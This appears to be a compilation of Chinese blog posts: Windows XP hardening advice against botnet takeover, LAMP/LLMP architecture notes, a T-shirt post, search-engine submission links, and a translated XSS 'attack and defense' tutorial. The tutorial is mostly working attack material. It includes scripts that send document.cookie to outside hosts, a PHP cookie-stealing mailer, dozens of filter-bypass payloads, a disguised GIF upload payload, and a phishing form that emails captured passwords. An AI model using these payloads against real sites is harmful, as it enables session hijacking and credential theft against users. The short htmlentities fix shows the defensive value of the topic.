如何防止自己成为别人的“肉鸡”?

肉鸡是指被黑客控制的网络设备的统称。常见的有个人电脑、服务器,也有你想不到的,如街头信息亭、街头摄像头等等只要跟网络有关的东西都可以。看过《虎胆龙威4》的话,您可能会对黑客有一个新的理解,网络安全问题现在已经成为了网络的头等大事,那我们自己的电脑的安全怎么保障呢?
一、防止主机成为肉鸡的安全技术措施
1、利用操作系统自身功能加固系统
通常按默认方式安装的操作系统,如果不做任何安全加固,那么其安全性难以保证。攻击者稍加利用便可使其成为肉鸡。因此,防止主机成为肉鸡的第一步,便是系统加固。
鉴于目前大部分用户仍然使用Windows XP,因此,本文所有内容都基于Windows XP。
(1)加强系统登录帐户和密码的安全
系统设置的密码应当符合复杂性和最小长度的要求,不仅要包括常用英文字母、数字、字母大小写,最好还可以加入特殊字符(如@等),而且密码的字符数不应该小于8位。
另外,为了防止黑客通过默认帐户登录系统,我们建议为管理员帐号设置密码并禁用guest账户。
(2)取消远程协助和远程桌面连接
用鼠标右击桌面上的“我的电脑”图标,选择“属性”,在“系统属性”中选择“远程”选项卡,然后取消“远程协助”和“远程桌面连接”复选框中的钩。
(3)禁用危险的系统服务
在Windows XP系统中,一些端口与相应的系统服务是相关联的,有的服务还与系统中的特定端口相关联,例如Terminal Services服务与3389端口关联。因此,禁用一些不需要的服务,不仅能降低系统资源消耗,而且能增强系统安全性。
在“开始”——“运行”框中输入“services.msc”,按回车后进入“服务”管理界面。禁用以下服务:
NetMeeting Remote Desktop Sharing
Remote Desktop Help Session Manager
Remote Registry
Routing and Remote Access
Server
TCP/IP NetBIOS Helper
Telnet
Terminal Services
(4)关闭137、138、139和445端口
用鼠标右击桌面中的“网上邻居”,选择“属性”。在“本地连接”界面,打开“Internet协议(TCP/IP)”的属性对话框。在此对话框 中,单击“高级”按钮,选择“WINS”选项,然后选择“禁用TCP/IP上的NetBIOS”,这样就关闭了137、138和139端口。同时,通过取 消“本地连接”属性中的“Microsoft 打印机和文件共享”可以关闭445端口。
(5)启动系统审核策略
“开始”——“运行”框中输入“gpedit.msc”进入组策略编辑器,在计算机配置——Windows设置——安全设置——本地策略——审核策略中,将审核登录事件、审核对象访问、审核系统事件和审核帐户登录事件启用成功方式的审核。
(6)用户权利指派
同样在组策略编辑器,在计算机配置——Windows设置——安全设置——本地策略——用户权利指派中,将“从网络访问此计算机”策略中的所用 用户都删除,在“拒绝从网络访问此计算机”策略中确保已有“everyone”帐户,然后再删除“通过终端服务允许登录”策略中的所有用户,并确保在“通 过终端服务拒绝登录”策略中有“everyone”帐户。
(7)禁用系统默认共享
在组策略编辑器中,计算机配置——Windows设置——安全设置——安全选项,将“网络访问:不允许SAM帐户的匿名枚举”及“网络访问:不 允许SAM帐户和共享的匿名枚举”全部启用;将“网络访问:可匿名访问的共享”、“可匿名访问的管道”及“可远程访问的注册表路径”中的内容全部删除。
打开注册表编辑器,进入 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters 项,在其右边新建一个键值名为“Autoshareserver”,键值为0的DWORD值,这样就可以禁止系统C$、D$、E$等方式的共享;为了能禁 止admin$共享,还应当在此注册表项中新建一个键值名为“Autosharewks”,键值为0的DWORD值。
最后,打开“资源管理器”,选择“工具”菜单中的“文件夹选项”,在出现的文件夹选项界面中的“高级设置”框中,取消“使用简单文件共享”的多项选择项。
2、使用安全软件加固操作系统
对加固操作系统安全性而言,我们还可以通过安装相应的安全软件来进一步增强系统的安全性能。
(1)安装杀毒软件
在系统中安装杀毒软件主要用来防止黑客通过木马来控制我们的主机。当我们安装好杀毒软件后,一定要立即更新病毒库到最新状态,如有必要,还应当设置每天按时自动更新病毒库。
(2)安装防火墙
黑客的入侵活动通常是从扫描系统中是否开放有高危端口开始的,因此,禁用高危端口(如135、137、138、139、445、3389等)十分必要。虽然前面介绍了如何
通过手工的方式关闭系统高位端口,这里借助安全软件同样可以起到加固作用。同时,我们还应当限制系统中能够与互联网通信的进程和应用程序,以减少网络应用程序本身漏洞带来的安全风险。
虽然Windows XP系统本身带有一个“Internet 防火墙”,但它远远不能满足日益增长的安全防范需求,因此,我们通过安装第三方防火墙软件来解决这些问题。
现在市面上存在的防火墙不仅具有包过滤和应用程序跟踪的基本防火墙功能,它们还具有属于自己的独特功能。例如,Tiny Firewall防火墙。它不仅具有普通应用层防火墙的功能,还具有IDS、文件完整性检测和主动防御的功能。并且还为用户提供了一个实时网络连接监控功 能,可以让用户随时掌握当前的网络连接情况,了解连接的网络应用程序都使用了哪些端口,连接到了什么目标上,并直接显示出对方的IP地址。图1就是它的网 络连接监控界面。
(3)使用代理服务器
黑客要想扫描计算机,就必需先知道计算机连网公网IP地址。如果能够隐藏这个公网IP地址,将为黑客的攻击行为增加难度。隐藏IP地址最好的方 式就是使用代理服务器。对于普通的网络用户来说,可以通过使用HTTP代理和在计算机上安装简单的代理软件来达到隐藏IP地址的目的。
使用HTTP代理非常简单,进入提供此功能的网站,例如http://www.web4proxy.com/,如图2所示。在“开始浏览”按钮前的文本框中填入要访问的站点,就可以通过隐藏IP的方式浏览想访问的网站了。
但是,使用HTTP代理只能防止由于浏览网页而泄漏IP地址的风险,要想隐藏其它网络活动时的IP地址,例如进行的QQ聊天和玩网络游戏等网络应用,就必需通过在系统中安装代理服务器软件的方法来解决。
Waysonline是一个不需要安装的代理服务器软件,在使用前,要先免费注册
输入注帐户和密码后登录。此时,右击Windows任务栏中的绿色“W”图标,在此菜单中的“运行程序”菜单项中,可以由我们选择代理的各种方式。
二、防止主机成为肉鸡的安全管理措施
就算我们对系统的安全技术措施做得再好,如果不能对系统进行有效的安全管理和对自己的网络行为进行有效的控制,那么,这些已经实施了的安全技术措施,就成为了一种没有实际作用的摆设而已。
对系统实施安全管理措施可以分成两个部分来执行:其一为系统安全管理,其二就是用户网络操作行为管理。
1、系统安全管理
一个全面的系统安全管理应当包括下列所示的内容:
(1)操作系统漏洞补丁管理。为系统打补丁是一件非常重要的工作,我们可以通过360安全卫士的“修复系统漏洞”功能来完成。
(2)网络应用程序版本更新。我们应当及时升级QQ、MSN及网络浏览器等应用程序到最新版本。
(3)杀毒软件病毒库和防火墙规则审查。虽然杀毒软件都可以通过自动更新方式更新病毒库,我还是建议你养成按时手动更新病毒库的习惯,并且,在 每次手动杀毒前进行手动更新病毒库一次。同时,对于防火墙规则,尤其是应用程序规则,我们要经常检查是否添加了不明规则,以便及时取消。
(4)定期检查系统审核日志。经常检查这些审核产生的日志,能及时发现系统是否已经被入侵,或者已经受到过某种入侵行为的侵扰。
(5)在使用计算机过程中,要养成查看系统运行进程的习惯。通过360安全卫士的“系统全面诊断”就能查看到当前系统中正在运行的进程的详细信息。
(6)要经常查看目前的网络连接情况。如果你没有安装上面提到的Tiny Firewall防火墙,仍然可以通过360安全卫士“高级”选项卡中的“网络连接状态”来了解当前系统的网络连接状况。
2、用户网络操作行为控制
要控制的网络行为方面包括:
(1)使用安全性能高的浏览器。只去正规的网站浏览新闻,下载MP3、MP4和软件等。
(2)要养成只在浏览器地址栏中输入URL访问网站的习惯。例如,一些网上银行都使用了一种叫做EV-SSL认证的方式来标明网站的真实性,如 果用户发现自己IE8浏览器地址栏中的URL地址变成了绿色,那么就可以肯定这个网站是真实的。再加上不要轻易点击电子邮件或QQ等即时聊天软件界面中的 网站链接,就可以很好地减少被网络钓鱼攻击的风险。
(3)不要浏览色情、赌博等网站。
(4)不要轻易接受QQ或MSN好友发来的下载链接,除非你知道它们是安全可靠的。
(5)应当使用安全性能高的网络应用程序。例如搜索引擎最好使用Google,它能够将搜索到的可能含有某种安全风险的网站直接标识出来,并且不能进入。使用安全性高的应用程序,能大大减少被木马控制的风险。
(6)对于突然接到的某个自称是电信、计算机销售商及银行等企业的服务人员打来的电话,如果你不熟悉这个电话号码,或者不熟悉对方的声音,你一 定要提高警惕。尤其当他们向你询问有关系统、电子邮件、网上银行帐户等机密信息时,你一定要马上拒绝。我们只有对与此相似的事件保持高度的怀疑,才能有效 地防止黑客通过社会工程的方式来攻击我们。
总而言之,只有网络用户认识认真细致地对系统实施相应的安全技术和安全管理措施,才能在计算机生命周期的各个阶段防止自己的计算机成为黑客们的肉鸡。

LLMP高性能网站架构设计方案

在网站架构设计中,大家一定对 LAMP (Linux Apache Mysql Php) 不陌生。
LAMP确实是一个非常优秀的架构,秉承着自由,开放,高效,易用的设计理念。
但是,本文不打算探讨LAMP,网上有很多介绍LAMP的资料。
这里,想给大家介绍另一个在LAMP上衍生出来的,以提升性能为主要目的的开源网站架构。
1、选择高性能 OS
首先,不难理解,任何一个server最底层的支撑还是OS,而OS的选择,主要包括 Unix, Windows server, Linux, BSD等等。
其中,开源的OS,有Linux, BSD及部分unix。从目前使用情况来看,linux还是网站首选OS之一。
但是,Linux由于其自由的特点,也给选择产生了一些不便 – 发行版太多。
现有的主流版本包括 red hat(RHEL), ubuntu, 红旗, opensuse, debian等。
其中,每一个发行版都有自己的特色,比如RHEL的稳定,ubuntu的易用,红旗的中文支持很棒等。
但要以性能为主,又兼顾稳定,易用性,以上都不是最佳选择。
这里推荐一个发行版,它是一个极限性能,加高度可定制,优化的 Linux – gentoo。
gentoo的性能优化是从kernel源码编译就开始入手了,通过选择不同的源码包,可以适应于不同的应用场景。
(不同内核介绍: http://imkenwu.javaeye.com/blog/168906 )
举个经典的例子:国内,douban.com 在定制优化过的 gentoo 上跑的web服务器最高一天支撑了 2500 万pv。

豆瓣的 Web 服务器


这种流量,哪怕是提供纯静态的内容,也是很恐怖的。
而支持这种大流量的,除了server本身,最关键的就是高度精简的OS了。
所以,综上所述,高性能网站推荐使用可优化,定制的 gentoo 作为载体。
2、 选择高性能 web server
Apache是 LAMP 架构最核心的 web server, 开源,模块丰富,功能强大,稳定是它的绝对优势。
在美国前100个网站中,有49%的使用apache。可见其影响力。
但是,有利有弊,apache的致命缺陷,就是多于臃肿,强大的功能,一定会带来性能上的损耗。
面对这种情形,在市场上,有一支异军突起,那就是更轻量级的 web server – lighty(lighttpd)。
官方为它定义的口号是 fly light。
它具有非常低的内存开销,cpu占用率低,效能好,以及丰富的模块支持等特点。
这让他在短时间内占据了14%以上的市场份额。并且有越来越多的人开始选择使用lighty作为前端 web server。
到这里为之,其实高性能 web server 非 lighty 莫属。但更棒的是,依靠 gentoo 的高度定制化,我们还可以
进一步提升 lighty 的性能潜力-那就是定制 lighty。
3、选择高性能 database
数据库是任何网站走动态化内容展现及业务数据存储的保障。
市面上的开源数据库主要有 mysql , postgresql , berkeley db, sqlite 等。
其中,对比一下,
mysql : 多线程,多处理器,高性能,5.0以上支持事务,丰富数据类型和sql语法,跨平台。
postgresql : 面向对象,集成web,支持事务,使用进程,速度略慢于mysql.
berkeley db : 嵌入式,数据操作通过接口完成,跨语言。
sqlite : 与php集成,支持ACID特性,支持大并发量,库锁。
从上面的对比中,不难看出,mysql 应该是性能,稳定性与功能性的综合之选。
4、选择高性能 script language
能与 lighty 结合的脚本语言,主要有 ruby, php, python, perl。方式主要是通过 fast-cgi 来访问。
只从性能角度对比几种语言:
( http://www.timestretch.com/FractalBenchmark.html )
不难看出,python 是此次测试中,性能最好的脚本语言。
动态处理方面有绝对优势。对比 php , 前者,可以更快的渲染输出内容,并由经lighty, 高速flush缓存到浏览器。
值得一提的是, douban.com 也是使用 python 作为应用服务器。
语言性能对比
总结一下,什么是 LLMP?
LLMP 是 Linux Lighty Mysql Python 的组合,作为一种高性能的网站架构设计存在。
什么是高性能的LLMP?
LLMP并不意味着高性能,只是比其他架构,更有性能的提升潜力。高性能的LLMP,需要从系统,程序,硬件各个层面上协同进行的。
FROM:http://www.javaeye.com/topic/174335

视野网团队T恤

看到团队的T恤,心里不禁兴奋。视野网开通差不多半年了,起初的定位在网站架构运营方面,后来重新定位在“关注互联网”。作为一个里程碑性的T恤,在这记录一下时间。2009年8月29日。做网站跟做人一样,要做到专业专注,视野网刚刚起步,非常感谢各位的关注,您的关注,就是我们前进的最大动力!
在下面放了些空白的T恤模板,如果想做的朋友可供参考。如果您喜欢FovWebT恤的话,就联系我们吧!

大清早起来拍的图,现在传上:T恤模板

这个是当时印T恤前做的模板

T恤:男女都可,各码

女装:ONLY FOR MM

女装背部

Blank T-Shirt White

白色T恤模板

Blank T-Shirt Black

黑色T恤模板

LAMP网站架构方案分析

LAMP(Linux-Apache-MySQL-PHP)网站架构是目前国际流行的Web框架, 该框架包括:Linux操作系统,Apache网络服务器,MySQL数据库,Perl、PHP或者Python编程语言,所有组成产品均是开源软件,是 国际上成熟的架构框架,很多流行的商业应用都是采取这个架构,和Java/J2EE架构相比,LAMP具有Web资源丰富、轻量、快速开发等特点,微软 的.NET架构相比,LAMP具有通用、跨平台、高性能、低价格的优势,因此LAMP无论是性能、质量还是价格都是企业搭建网站的首选平台。
对于大流量、大并发量的网站系统架构来说,除了硬件上使用高性能的服务器、负载均衡、CDN等之外,在软件架构上需要重点关注下面几个环节:使用高性能 的操作系统(OS)、高性能的网页服务器(Web Server)、高性能的数据库(Databse)、高效率的编程语言等。下面我将从这几点对其一一讨论。
操作系统
Linux操作系统有很多个不同的发行版,如Red Hat Enterprise Linux、SUSE Linux Enterprice、Debian、Ubuntu、CentOS等,每一个发行版都有自己的特色,比如RHEL的稳定,Ubuntu的易用,基于稳定性 和性能的考虑,操作系统选择CentOS(Community ENTerprise Operating System)是一个理想的方案。
CentOS(Community ENTerprise Operating System)是Linux发行版之一,是RHEL/Red Hat Enterprise Linux的精简免费版,和RHEL为同样的源代码,不过,RHEL和SUSE LE等企业版,提供的升级服务均是收费升级,无法免费在线升级,因此要求免费的高度稳定性的服务器可以用CentOS替代Red Hat Enterprise Linux使用。

LAMP网站架构图

LAMP网站架构图

Web服务器、缓存和PHP加速
Apache是LAMP架构最核心的Web Server,开源、稳定、模块丰富是Apache的优势。但Apache的缺点是有些臃肿,内存和CPU开销大,性能上有损耗,不如一些轻量级的Web 服务器(例如nginx)高效,轻量级的Web服务器对于静态文件的响应能力来说远高于Apache服务器。
Apache做为Web Server是负载PHP的最佳选择,如果流量很大的话,可以采用nginx来负载非PHP的Web请求。nginx是一个高性能的HTTP和反向代理服 务器,Nginx以它的稳定性、丰富的功能集、示例配置文件和低系统资源的消耗而闻名。Nginx不支持Windows,只能在包括Linux等环境下安 装,也不支持PHP和CGI等,但支持负载均衡和容错,可和Apache配合使用,是轻量级的HTTP服务器的首选。
Web服务器的缓 存也有多种方案,Apache提供了自己的缓存模块,也可以使用外加的Squid模块进行缓存,这两种方式均可以有效的提高Apache的访问响应能力。 Squid Cache是一个Web缓存服务器,支持高效的缓存,可以作为网页服务器的前置cache服务器缓存相关请求来提高Web服务器的速度,把Squid放在 Apache的前端来缓存Web服务器生成的动态内容,而Web应用程序只需要适当地设置页面实效时间即可。如访问量巨大则可考虑使用memcache作 为分布式缓存。
PHP的加速使用eAccelerator加速器,eAccelerator是一个自由开放源码PHP加速器,优化和动 态内容缓存,提高了性能PHP脚本的缓存性能,使得PHP脚本在编译的状态下,对服务器的开销几乎完全消除。它还有对脚本起优化作用,以加快其执行效率。 使PHP程序代码执效率能提高1-10倍。
具体的解决方案有以下几种:
1、squid + Apache + PHP + eAccelerator
使用Apache负载PHP,使用squid进行缓存,html或图片的请求可以直接由squid返回给用户。很多大型网站都采用这种架构。
2、nginx/Apache + PHP(fastcgi) + eAccelerator
使用nginx或Apache负载PHP,PHP使用fastcgi方式运行,效率较高。
3、nginx + Apache + PHP + eAccelerator
此方案综合了nginx和Apache的优点,使用Apache负载PHP,nginx负责解析其他Web请求,使用nginx的rewrite模块,Apache端口不对外开放。
数据库
开源的数据库中,MySQL在性能、稳定性和功能上是首选,可以达到百万级别的数据存储,网站初期可以将MySQL和Web服务器放在一起,但是当访问 量达到一定规模后,应该将MySQL数据库从Web Server上独立出来,在单独的服务器上运行,同时保持Web Server和MySQL服务器的稳定连接。
当数据库访问量达到更大的级别,可以考虑使用MySQL Cluster等数据库集群或者库表散列等解决方案。
总的来说,LAMP架构的网站性能会远远优于Windows IIS + ASP + Access(例如月光博客)这样的网站,可以负载的访问量也非常大,国内的大量个人网站如果想要支撑大访问量,采用LAMP架构是一个不错的方案。
综上所述,基于LAMP架构设计具有成本低廉、部署灵活、快速开发、安全稳定等特点,是Web网络应用和环境的优秀组合。
原创文章如转载,请注明:转载自月光博客 [ http://www.williamlong.info/ ]
本文链接地址:http://www.williamlong.info/archives/1908.html

跨站脚本-攻击和防御指向

先久以前翻译的一篇文章,在这里归下档。
原文:milw0rm.com
作者:Xylitol
翻译:老臧
摘要:
1>什么是XSS?
2>XSS脚本攻击
3>制造一个cookie攻击
4>保护XSS
5>笨方法
6>过滤绕过
7>Flash攻击
8>XSS 上传
9>XSS 钓鱼
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 1 – 什么是XSS? :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
跨站脚本的脚本是一个浏览器,同时利用利用一个漏洞为基础的安全解决方案。 这次袭击使内容(脚本) ,在无特权区被执行与权
限的一个特权区-即一个特权升级与客户端(浏览器)执行脚本。这些漏洞有可能是:
* Web浏览器的漏洞,这在一定条件下,允许内容(脚本)在一个区被执行的权限的更高特权区。
* Web浏览器配置漏洞,不安全的站点在特定的区域被列出
* 特定的区域被跨站脚本攻击
用命令攻击要有如下两个步骤:
第一步,用一个跨站脚本攻击,得到在特定区域的代码执行权限.为了完成攻击,然后利用不安全的ActiveX控件,来在相应的电脑上做一
些恶意操作.
当这个攻击完成后,将有恶意软件(像蠕虫\远程控制软件)被悄悄的安装在被攻击者的电脑上、打开一些有危害的网页。
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 2 – XSS脚本攻击 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
新建一个文本文档,把下面的代码放进:
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<style type=”text/css”>
<!–
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
–>
</style><title>Simple XSS vulnerability by Xylitol</title>
<body>
<form action=”XSS.php” method=”post”>
<p align=”center”><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align=”center”>
<table width=”270″ border=”0″>
<tr>
<td width=”106″><strong>Search:</strong></td>
<td width=”154″><input name=”Vulnerability” type=”text” id=”Vulnerability” /></td>
</tr>
</table>
<table width=”268″ border=”0″>
<tr>
<td width=”262″><div align=”center”>
<input name=”submit” type=”submit” value=” Search it ! ” />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>
然后,把这个页面保存为index.html
再新建一个文本文档,把下面的代码放进去:
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<title>Search result:</title>
<style type=”text/css”>
<!–
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
–>
</style></head>
<body>
<span>Search result :</span>&nbsp;<strong><?php echo $_POST[‘Vulnerability’]; ?></strong>&nbsp;
</body>
</html>
把文件另存为XSS.php
关闭记事本
在firefox里面打开index.html
输入一个值然后点search
返回页面输入
<script>alert(‘XSS’)</script>
发送表单
弹出一个对话框
_______________________________________
/ http://127.0.0.1 dit: X \
|________________________________________|
| |
| |
| ^ |
| / \ |
| / | \ XSS |
| / . \ |
| ——- |
| ______ |
| | OK | |
| —— |
|________________________________________|
XSS攻击这时产生了…
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 3 – 制造一个cookie攻击 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
把这段代码插入到一个易受攻击的页面(如:留言板)
<script>
window.open(“http://www.lovelaozang.cn/cookie.php?cookies=”+document.cookie);
</script>
(www.Hax0r.com = 你的网站)
打开记事本,把下面的代码放进去,另存为cookie.php
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<title>Error</title>
<style type=”text/css”>
<!–
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
–>
</style></head>
<? mail(’email@example.com’, ‘Cookie stealed ! – thx xyli :)’, $cookies); ?>
<body>
<h2><strong>Error</strong> – <strong>Access denied</strong> for <? echo $_SERVER[“REMOTE_ADDR”]; ?></h2>
</body>
</html>
这对于攻击者还不够,等着还不如接收电子邮件。
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 4 – 保护XSS :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
修补漏洞:
为修复XSS漏洞使用htmlentities
在第16行放置
<body>
<span>Search result :</span>&nbsp;<strong><?php echo $_POST[‘Vulnerability’]; ?></strong>&nbsp;
</body>
By:
<body>
<span>Search result :</span>&nbsp;<strong><?php
if(isset($_POST[‘Vulnerability’])) { echo htmlentities($_POST[‘Vulnerability’]); } ?></strong>&nbsp;
</body>
use htmlspecialchars() function in PHP 😉
other function:
htmlentities() quotes
strip_tags()

____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 5 – 笨方法 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
要想进行一个XSS攻击是相当简单的事情,这里有些常用的方法:
利用image:
<IMG SRC=”http://lovelaozang.cn/xss.png”>
利用flash:
<EMBED SRC=”http://hax0r.com/Haxored.swf”>
重定向:
<script>window.open( “http://lovelaozang.cn/xss.html” )</script>
还有:
<meta http-equiv=”refresh” content=”0; url=http://lovelaozang.cn/xss.html” />
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 6 – 过滤绕过 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
事实上也不是那么简单就能绕过 htmlspecialchars()
这里有一些关于绕过xss的例子:
<META HTTP-EQUIV=\”refresh\” CONTENT=\”0;URL=http://;URL=javascript:alert(‘XSS’);\”>
<META HTTP-EQUIV=\”refresh\”CONTENT=\”0;url=javascript:alert(‘XSS’);\”>
‘”>><marquee><h1>XSS</h1></marquee>
‘”>><script>alert(‘XSS’)</script>
‘>><marquee><h1>XSS</h1></marquee>
“><script alert(String.fromCharCode(88,83,83))</script>
<iframe<?php echo chr(11)?> onload=alert(‘XSS’)></iframe>
<div
style=”x:expression((window.r==1)?”:eval(‘r=1;alert(String.fromCharCo
de(88,83,83));’))”>
window.alert(“Xyli !”);
“/></a></><img src=1.gif onerror=alert(1)>
[color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
<body onLoad=”alert(‘XSS’);”
<body onunload=”javascript:alert(‘XSS’);”>
click me
<script language=”JavaScript”>alert(‘XSS’)</script>
<img src=”javascript:alert(‘XSS’)”>
‘); alert(‘XSS
<font style=’color:expression(alert(document.cookie))’>
<IMG DYNSRC=\”javascript:alert(‘XSS’)\”>
<IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
</textarea><script>alert(/xss/)</script>
</title><script>alert(/xss/)</script>
<script src=http://yoursite.com/your_files.js></script>
“><script>alert(0)</script>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=\”jav&#x0D;ascript:alert(‘XSS’);\”>
<IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>
<IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>
<marquee><script>alert(‘XSS’)</script></marquee>
<? echo(‘<scr)’;
echo(‘ipt>alert(\”XSS\”)</script>’); ?>
<IMG SRC=\”jav&#x0A;ascript:alert(‘XSS’);\”>
<IMG SRC=\”jav&#x09;ascript:alert(‘XSS’);\”>
<marquee><script>alert(‘XSS’)</script></marquee>
<style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style>
<img src=foo.png onerror=alert(/xssed/) />
<script>alert(String.fromCharCode(88,83,83))</script>
<scr<script>ipt>alert(‘XSS’);</scr</script>ipt>
<script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+
escape(document.cookie)</script>
<script src=”http://www.evilsite.org/cookiegrabber.php”></script>
<script>alert(‘XSS’);</script>
<script>alert(1);</script>
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 7 – Flash攻击 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
Flash是用来做复杂的动画,模拟的,创造游戏等。
getURL()这个函数是有趣的,可以用来我们的攻击。这个函数可以帮我们改变最终用户到其它页面。
它的语法是这样的:getURL(url:String, [window: String,[method:String]])
如:
getURL(“http://lovelaozang.cn/login.php?logout=true”,”_self”);
url: 网站的地址
window: 指定框架要求(_self, _blank…)
method: 请求方法 GET or POST (by defect GET)
这里的处理动作和JavaScript以发布警报:
getURL(“javascript:alert(‘XSS'”);
在2002年表现出这种形式的危险
这种方式是一种可以发送用户的cookie的;
getURL(“javascript:alert(document.cookie)”)
在2005年12月,开辟新的途径,并出现构成已受益于两年前XSS和可能性,把一个文件Flash放在签名中,以提供一个永久性跨站脚本
攻击此外,作者的这种另类使用的技术,以便传给公司,以背离蠕虫着XSS的德萨米:Samy 重装上阵
用flash窃取cookie?
不是,但有技术的做:
如:
在一个FLASH文件:
GetURL(“http://www.victime.com/page.php?var=<script src=’http://www.lvoelaozang.cn/hack.js&#39;></script>”,”_self”);
在这个hack.js文件里面有如下代码:
document.location=”http://hax0r.com/cookiestealer.php?cookie=”+document.cookie;
这个解决方法很简单:就是禁止flash文件在你的WEB应用上使用.
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 8 – XSS 上传 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
兴个例子,我们来新建一个hack.gif文件.然后用记事本打开文件,删除所有的内容,然后写入代码
GIF89a<script>alert(“XSS”)</script>
保存退出.
上传hack.gif到相就的地方…此时跨站发生
不要用Mozillia Firefox来访问那张图片,Mozillia 不会执行我们的alert.要用Internet explorer.
为什么添加GIF89a ?
因为很多上传程序会来检查我们的gif文件是否包含 ‘GIF89a’,如果包括则认为是gif文件.
GIF89a<script src=”http://lovelaozang.cn/cookiegrabber.php”></script>
我们需要知道一些其它格式图片,头部所包含的代码.
PNG = ‰PNG
GIF = GIF89a
JPG = ???à JFIF
BMP = BMF?
为了安全不要仅仅只检查getimagesize()
____ ____
/ / \ \
______/ /_____________________________________\ \______
| / / \ \ |
| / /.:Chapter 9 – XSS 钓鱼 :.\ \ |
|___/ /___________________________________________\ \___|
/ / \ \
/___/ \___\
你是否明白什么是钓鱼?什么是XSS?
在这个例子里,有必需找到一个易受攻击的网站去XSS并注入那里,身于一种形式,以自己直接在网址以下代码
<p>Enter your login and password, thank:</p>
<form action=”http://hax0r.com/mail.php”>
<table><tr><td>Login:</td><td><input type=text length=20 name=login>
</td></tr><tr><td>Password:</td><td>
<input type=text length=20 name=password>
</td></tr></table><input type=submit value= OK >
</form>
这个通过这个模仿的表单,然后利用mail.php通过电子邮件把表单里的数据发送给你。
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-
transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<title>Error</title>
<style type=”text/css”>
<!–
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
–>
</style></head>
<?php
$login = $HTTP_GET_VARS[“login”];
$password = $HTTP_GET_VARS[“password”];
mail(“email@example.com”, “Cookie stealed ! – thx xyli :)”, $password , $login );
?>
<body>
<h2><strong>Error</strong> -<strong> Server too much busy</strong></h2>
</body>
</html>
用户会认为,服务器可能超过了负载,并不会怀疑
我想大家现在应该明白了这个原理了 Welcome to laozang’s blog!

知名搜索引擎登陆地址大全

知名搜索引擎登陆地址大全,希望对大家有用。
搜索引擎推广——英文
Google http://www.google.com/addurl.html
Dmoz http://www.dmoz.org/add.html
HotBot http://www.hotbot.com/prefs_filters.asp?prov
Intelseek http://intelseek.com/add_url_form.asp
Netscape http://about.netscape.com
Gigablast http://www.gigablast.com/addurl?
中文搜索引擎登录
孙悟空登录口:http://www.sunwukong.cn/add.php
TOM搜索登录口:http://search.tom.com/tools/weblog/log.php
蕃薯藤登录口:http://reg.yam.com/register/register.asp
奇摩搜索登录口:http://tw.dir.yahoo.com/step/index.html
Gais 盖世引擎登录口:http://gais.cs.ccu.edu.tw/reg_new.php
openfind蚁搜登录口:http://www.antso.com/apply.asp
英文搜索引擎登录
google登录口:http://www.google.com/addurl.html
dmoz登录口:http://www.dmoz.org/add.html
intelseek登录口:http://intelseek.com/add_url_form.asp
AddMe登录口:http://www.addme.com/s0new.htm
Voyager登录口:http://www.voyagersearch.com/cgi-bin/q/search.cgi?NAVG=AddURL
Gigablast登录口:http://www.gigablast.com/addurl
Infotiger 登录口:http://www.infotiger.com/addurl.html
Nationaldirectory登录口:http://www.nationaldirectory.com/addurl/
WhatUseek登录口:http://www.whatuseek.com/addurl-secondary.shtml
Exactseek登录口:http://www.exactseek.com/add.html
Walhello登录口:http://www.walhello.com/addlinkgl.html
